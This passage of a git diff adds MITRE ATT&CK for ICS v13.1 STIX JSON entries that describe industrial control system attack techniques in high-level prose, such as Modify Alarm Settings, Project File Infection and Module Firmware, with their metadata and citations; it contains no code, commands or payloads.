(Citation: CISA AA21-201A Pipeline Intrusion July 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Daisuke Suzuki" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Engineering Workstation", + "Human-Machine Interface", + "Control Server" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Module: Module Load", + "Network Share: Network Share Access", + "Process: Process Creation", + "Logon Session: Logon Session Creation", + "Network Traffic: Network Connection Creation", + "Command: Command Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "created": "2021-04-12T19:26:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0886", + "external_id": "T0886" + }, + { + "source_name": "Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017", + "description": "Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer 2017, December 14 Attackers Deploy New ICS Attack Framework TRITON and Cause Operational Disruption to Critical Infrastructure Retrieved. 
2018/01/12 ", + "url": "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html" + }, + { + "source_name": "CISA AA21-201A Pipeline Intrusion July 2021", + "description": "Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA) 2021, July 20 Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013 Retrieved. 2021/10/08 ", + "url": "https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdf" + }, + { + "source_name": "Dragos December 2017", + "description": "Dragos 2017, December 13 TRISIS Malware Analysis of Safety System Targeted Malware Retrieved. 2018/01/12 ", + "url": "https://dragos.com/blog/trisis/TRISIS-01.pdf" + }, + { + "source_name": "Joe Slowik April 2019", + "description": "Joe Slowik 2019, April 10 Implications of IT Ransomware for ICS Environments Retrieved. 2019/10/27 ", + "url": "https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e2994b6a-122b-4043-b654-7411c5198ec0.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e2994b6a-122b-4043-b654-7411c5198ec0.json new file mode 100644 index 0000000000000000000000000000000000000000..ce7cfcbeb641b46f87636c601e6a9d8267529911 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e2994b6a-122b-4043-b654-7411c5198ec0.json 
@@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--b72c047f-1768-4622-bfdf-253abd1e2290", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "I/O Module Discovery", + "description": "Adversaries may use input/output (I/O) module discovery to gather key information about a control system device. An I/O module is a device that allows the control system device to either receive or send signals to other devices. These signals can be analog or digital, and may support a number of different protocols. Devices are often able to use attachable I/O modules to increase the number of inputs and outputs that it can utilize. An adversary with access to a device can use native device functions to enumerate I/O modules that are connected to the device. Information regarding the I/O modules can aid the adversary in understanding related control processes.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--e2994b6a-122b-4043-b654-7411c5198ec0", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0824", + "external_id": "T0824" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e33c7ecc-5a38-497f-beb2-a9a2049a4c20.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e33c7ecc-5a38-497f-beb2-a9a2049a4c20.json new file mode 100644 index 0000000000000000000000000000000000000000..cb3be80979627e2c2c1a60ec517c53dfd04fb5c9 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e33c7ecc-5a38-497f-beb2-a9a2049a4c20.json 
@@ -0,0 +1,65 @@ +{ + "type": "bundle", + "id": "bundle--a2d23f8d-0a4a-4f0b-8270-75256d235ddb", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:15:14.260Z", + "name": "Denial of Control", + "description": "Adversaries may cause a denial of control to temporarily prevent operators and engineers from interacting with process controls. An adversary may attempt to deny process control access to cause a temporary loss of communication with the control device or to prevent operator adjustment of process controls. An affected process may still be operating during the period of control loss, but not necessarily in a desired state. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)\n\nIn the 2017 Dallas Siren incident operators were unable to disable the false alarms from the Office of Emergency Management headquarters. (Citation: Mark Loveless April 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "type": "attack-pattern", + "id": "attack-pattern--e33c7ecc-5a38-497f-beb2-a9a2049a4c20", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0813", + "external_id": "T0813" + }, + { + "source_name": "Corero", + "description": "Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ", + "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf" + }, + { + "source_name": "Mark Loveless April 2017", + "description": "Mark Loveless 2017, April 11 THE DALLAS COUNTY SIREN HACK Retrieved. 
2020/11/06 ", + "url": "https://duo.com/decipher/the-dallas-county-siren-hack" + }, + { + "source_name": "Michael J. Assante and Robert M. Lee", + "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297" + }, + { + "source_name": "Tyson Macaulay", + "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", + "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92.json new file mode 100644 index 0000000000000000000000000000000000000000..f1827db0d01590419bfceaca8b5b29399406f481 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92.json 
@@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--97a2f1d7-e84d-4b11-b011-69b515684193", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:17:43.803Z", + "name": "Modify Alarm Settings", + "description": "Adversaries may modify alarm settings to prevent alerts that may inform operators of their presence or to prevent responses to dangerous and unintended scenarios. Reporting messages are a standard part of data acquisition in control systems. Reporting messages are used as a way to transmit system state information and acknowledgements that specific actions have occurred. These messages provide vital information for the management of a physical process, and keep operators, engineers, and administrators aware of the state of system devices and physical processes. \n\nIf an adversary is able to change the reporting settings, certain events could be prevented from being reported. This type of modification can also prevent operators or devices from performing actions to keep the system in a safe state. If critical reporting messages cannot trigger these actions then a [Impact](https://attack.mitre.org/tactics/TA0105) could occur. \n\nIn ICS environments, the adversary may have to use [Alarm Suppression](https://attack.mitre.org/techniques/T0878) or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. (Citation: Jos Wetzels, Marina Krotofil 2019) Methods of suppression often rely on modification of alarm settings, such as modifying in memory code to fixed values or tampering with assembly level instruction code. 
", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Human-Machine Interface", + "Control Server", + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED", + "Device Configuration/Parameters" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Operational Databases: Process History/Live Data", + "Network Traffic: Network Traffic Content", + "Asset: Asset Inventory" + ], + "type": "attack-pattern", + "id": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0838", + "external_id": "T0838" + }, + { + "source_name": "Jos Wetzels, Marina Krotofil 2019", + "description": "Jos Wetzels, Marina Krotofil 2019 A Diet of Poisoned Fruit: Designing Implants & OT Payloads for ICS Embedded Devices Retrieved. 2019/11/01 ", + "url": "https://troopers.de/downloads/troopers19/TROOPERS19_NGI_IoT_diet_poisoned_fruit.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07.json new file mode 100644 index 0000000000000000000000000000000000000000..69dadda481f7e2292dc0774ecf420de0de181be2 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07.json 
@@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--dd61cc75-878b-4708-84fa-b03934ac6db4", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Commonly Used Port", + "description": "Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend in with normal network activity, to avoid more detailed inspection. They may use the protocol associated with the port, or a completely different protocol. They may use commonly open ports, such as the examples provided below. \n \n * TCP:80 (HTTP) \n * TCP:443 (HTTPS) \n * TCP/UDP:53 (DNS) \n * TCP:1024-4999 (OPC on XP/Win2k3) \n * TCP:49152-65535 (OPC on Vista and later) \n * TCP:23 (TELNET) \n * UDP:161 (SNMP) \n * TCP:502 (MODBUS) \n * TCP:102 (S7comm/ISO-TSAP) \n * TCP:20000 (DNP3) \n * TCP:44818 (Ethernet/IP)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Matan Dobrushin - Otorio" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED", + "Human-Machine Interface", + "Control Server", + "Engineering Workstation" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0885", + 
"external_id": "T0885" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e72425f8-9ae6-41d3-bfdb-e1b865e60722.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e72425f8-9ae6-41d3-bfdb-e1b865e60722.json new file mode 100644 index 0000000000000000000000000000000000000000..63892c305fa9dfafbb1dfa52893707141ccbc5eb --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--e72425f8-9ae6-41d3-bfdb-e1b865e60722.json 
@@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--6ee95260-55f4-4b07-8f60-f4ad92ab1bb8", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-05-08T18:58:24.092Z", + "name": "Project File Infection", + "description": "Adversaries may attempt to infect project files with malicious code. These project files may consist of objects, program organization units, variables such as tags, documentation, and other configurations needed for PLC programs to function. (Citation: Beckhoff) Using built in functions of the engineering software, adversaries may be able to download an infected program to a PLC in the operating environment enabling further [Execution](https://attack.mitre.org/tactics/TA0104) and [Persistence](https://attack.mitre.org/tactics/TA0110) techniques. (Citation: PLCdev) \n\nAdversaries may export their own code into project files with conditions to execute at specific intervals. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) Malicious programs allow adversaries control of all aspects of the process enabled by the PLC. Once the project file is downloaded to a PLC the workstation device may be disconnected with the infected project file still executing. 
(Citation: PLCdev)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "persistence" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Engineering Workstation", + "Human-Machine Interface" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "File: File Modification" + ], + "type": "attack-pattern", + "id": "attack-pattern--e72425f8-9ae6-41d3-bfdb-e1b865e60722", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0873", + "external_id": "T0873" + }, + { + "source_name": "Beckhoff", + "description": "Beckhoff TwinCAT 3 Source Control: Project Files Retrieved. 2019/11/21 ", + "url": "https://infosys.beckhoff.com/english.php?content=../content/1033/tc3_sourcecontrol/18014398915785483.html&id=" + }, + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + }, + { + "source_name": "PLCdev", + "description": "PLCdev Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 Siemens SIMATIC Step 7 Programmer's Handbook Retrieved. 2019/11/21 ", + "url": "http://www.plcdev.com/book/export/html/373" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e.json
new file mode 100644
index 0000000000000000000000000000000000000000..bfa965ce2bea25d47762401817694fc6c50d8280
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e.json
@@ -0,0 +1,61 @@ +{ + "type": "bundle", + "id": "bundle--9bd0d03d-1e61-4876-83e4-e9e9cca8d0b6", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Network Connection Enumeration", + "description": "Adversaries may perform network connection enumeration to discover information about device communication patterns. If an adversary can inspect the state of a network connection with tools, such as Netstat(Citation: Netstat), in conjunction with [System Firmware](https://attack.mitre.org/techniques/T0857), then they can determine the role of certain devices on the network (Citation: MITRE). The adversary can also use [Network Sniffing](https://attack.mitre.org/techniques/T0842) to watch network traffic for details about the source, destination, protocol, and content.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: Process Creation", + "Script: Script Execution", + "Process: OS API Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0840", + "external_id": "T0840" + }, + { + "source_name": "MITRE", + "description": "MITRE System Network Connections Discovery Retrieved. 
2018/05/31 ", + "url": "https://attack.mitre.org/wiki/Technique/T1049" + }, + { + "source_name": "Netstat", + "description": "Wikipedia. (n.d.). Netstat. Retrieved May 23, 2022.", + "url": "https://en.wikipedia.org/wiki/Netstat" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d.json new file mode 100644 index 0000000000000000000000000000000000000000..960854e300da8b2121793ccb47404959c0fe220c --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d.json 
@@ -0,0 +1,61 @@ +{ + "type": "bundle", + "id": "bundle--4e6f52f7-0b94-49c3-acb3-49f8c8220716", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Lateral Tool Transfer", + "description": "Adversaries may transfer tools or other files from one system to another to stage adversary tools or other files over the course of an operation. (Citation: Enterprise ATT&CK) Copying of files may also be performed laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares. (Citation: Enterprise ATT&CK)\n\nIn control systems environments, malware may use SMB and other file sharing protocols to move laterally through industrial networks.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Control Server", + "Data Historian" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Process: Process Creation", + "File: File Creation", + "File: File Metadata", + "Network Share: Network Share Access", + "Network Traffic: Network Traffic Flow", + "Command: Command Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0867", + "external_id": "T0867" + }, + { + "source_name": "Enterprise ATT&CK", + 
"description": "Enterprise ATT&CK Enterprise ATT&CK Lateral Tool Transfer Retrieved. 2019/10/27 Lateral Tool Transfer Retrieved. 2019/10/27 ", + "url": "https://attack.mitre.org/techniques/T1570/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707.json new file mode 100644 index 0000000000000000000000000000000000000000..2845b59379c28d0ace90f1e57e206f7485388a6a --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707.json 
@@ -0,0 +1,61 @@ +{ + "type": "bundle", + "id": "bundle--bd74b813-e55a-4819-adf1-ae7fb3a9260c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Module Firmware", + "description": "Adversaries may install malicious or vulnerable firmware onto modular hardware devices. Control system devices often contain modular hardware devices. These devices may have their own set of firmware that is separate from the firmware of the main control system equipment. \n\nThis technique is similar to [System Firmware](https://attack.mitre.org/techniques/T0857), but is conducted on other system components that may not have the same capabilities or level of integrity checking. Although it results in a device re-image, malicious device firmware may provide persistent access to remaining devices. (Citation: Daniel Peck, Dale Peterson January 2009) \n\nAn easy point of access for an adversary is the Ethernet card, which may have its own CPU, RAM, and operating system. The adversary may attack and likely exploit the computer on an Ethernet card. Exploitation of the Ethernet card computer may enable the adversary to accomplish additional attacks, such as the following: (Citation: Daniel Peck, Dale Peterson January 2009) \n\n* Delayed Attack - The adversary may stage an attack in advance and choose when to launch it, such as at a particularly damaging time. \n* Brick the Ethernet Card - Malicious firmware may be programmed to result in an Ethernet card failure, requiring a factory return. \n* Random Attack or Failure - The adversary may load malicious firmware onto multiple field devices. Execution of an attack and the time it occurs is generated by a pseudo-random number generator. \n* A Field Device Worm - The adversary may choose to identify all field devices of the same model, with the end goal of performing a device-wide compromise. 
\n* Attack Other Cards on the Field Device - Although it is not the most important module in a field device, the Ethernet card is most accessible to the adversary and malware. Compromise of the Ethernet card may provide a more direct route to compromising other modules, such as the CPU module.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content", + "Operational Databases: Device Alarm", + "Firmware: Firmware Modification" + ], + "type": "attack-pattern", + "id": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0839", + "external_id": "T0839" + }, + { + "source_name": "Daniel Peck, Dale Peterson January 2009", + "description": "Daniel Peck, Dale Peterson 2009, January 28 Leveraging Ethernet Card Vulnerabilities in Field Devices Retrieved. 2017/12/19 ", + "url": "https://www.researchgate.net/publication/228849043_Leveraging_ethernet_card_vulnerabilities_in_field_devices" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--f8df6b57-14bc-425f-9a91-6f59f6799307.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--f8df6b57-14bc-425f-9a91-6f59f6799307.json
new file mode 100644
index 0000000000000000000000000000000000000000..6c890043d17491ad8c2acbe77fe465dc6176b47c
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--f8df6b57-14bc-425f-9a91-6f59f6799307.json
@@ -0,0 +1,75 @@ +{ + "type": "bundle", + "id": "bundle--2a817bbb-9524-4ceb-8264-0ec302ba9309", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Internet Accessible Device", + "description": "Adversaries may gain access into industrial environments through systems exposed directly to the internet for remote access rather than through [External Remote Services](https://attack.mitre.org/techniques/T0822). Internet Accessible Devices are exposed to the internet unintentionally or intentionally without adequate protections. This may allow for adversaries to move directly into the control system network. Access onto these devices is accomplished without the use of exploits, these would be represented within the [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T0819) technique.\n\nAdversaries may leverage built in functions for remote access which may not be protected or utilize minimal legacy protections that may be targeted. (Citation: NCCIC January 2014) These services may be discoverable through the use of online scanning tools. \n\nIn the case of the Bowman dam incident, adversaries leveraged access to the dam control network through a cellular modem. Access to the device was protected by password authentication, although the application was vulnerable to brute forcing. (Citation: NCCIC January 2014) (Citation: Danny Yadron December 2015) (Citation: Mark Thompson March 2016)\n\nIn Trend Micros manufacturing deception operations adversaries were detected leveraging direct internet access to an ICS environment through the exposure of operational protocols such as Siemens S7, Omron FINS, and EtherNet/IP, in addition to misconfigured VNC access. 
(Citation: Stephen Hilt, Federico Maggi, Charles Perine, Lord Remorin, Martin Rsler, and Rainer Vosseler)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Control Server", + "Data Historian", + "Field Controller/RTU/PLC/IED", + "Human-Machine Interface", + "Input/Output Server", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Logon Session: Logon Session Metadata", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--f8df6b57-14bc-425f-9a91-6f59f6799307", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0883", + "external_id": "T0883" + }, + { + "source_name": "Danny Yadron December 2015", + "description": "Danny Yadron 2015, December 20 Iranian Hackers Infiltrated New York Dam in 2013 Retrieved. 2019/11/07 ", + "url": 